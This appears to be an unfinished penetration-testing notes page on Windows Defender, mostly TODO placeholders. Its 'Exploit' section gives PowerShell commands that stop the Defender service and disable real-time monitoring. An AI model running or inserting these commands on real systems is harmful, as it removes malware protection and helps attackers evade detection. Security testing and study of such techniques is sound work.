Windows Defender

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Useful links
  5. Recommendations

Vulnerability

TODO: Describe the vulnerability here.

Prerequisites

  • TODO: List prerequisites here.

Exploit

# Check Windows Defender status.
Get-Service WinDefend

# Stop it if you can...
Stop-Service WinDefend -PassThru

# ...or disable real time monitoring!
Set-MpPreference -DisableRealtimeMonitoring 1

# Check which files have been detected.
Get-MpThreatDetection
  • TODO: List links here.

Recommendations

  • TODO: List recommendations here.